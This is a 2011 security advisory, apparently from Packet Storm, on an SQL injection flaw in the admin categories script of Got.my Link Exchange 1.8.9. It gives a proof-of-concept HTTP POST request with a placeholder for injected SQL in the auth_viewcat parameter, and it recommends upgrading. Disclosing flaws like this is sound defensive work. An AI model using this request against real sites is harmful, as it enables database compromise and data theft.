Got.my Link Exchange 1.8.9 SQL Injection

2011-05-04T00:00:00
ID PACKETSTORM:101102
Type packetstorm
Reporter Hector.x90
Modified 2011-05-04T00:00:00

Description

                                        
                                            `Vendor: http://www.got.my ( http://www.got.my/LINK-EXCHANGE-Script )  
Vulnerable Version: 1.8.9  
Vulnerability Type: SQL Injection  
Risk level: High  
Credit: Hector.x90  
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/admin/categories.php" script to properly sanitize user-supplied input.  
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.  
The following PoC is available:  
  
POST /admin/categories.php HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 263  
  
__csrf=53c2e96a96fcba6dc1d9626c846f665b&action=savecat&cat_name=1&cat_de  
scription=1&cat_parent_id=0&cat_order=0&auth_viewcat=SQL_CODE_HERE&auth_  
viewimage=0&auth_download=2&auth_upload=2&auth_directupload=9&auth_vote=  
0&auth_sendpostcard=0&auth_readcomment=0&auth_postcomment=2  
  
Solution: Upgrade to the most recent version  
`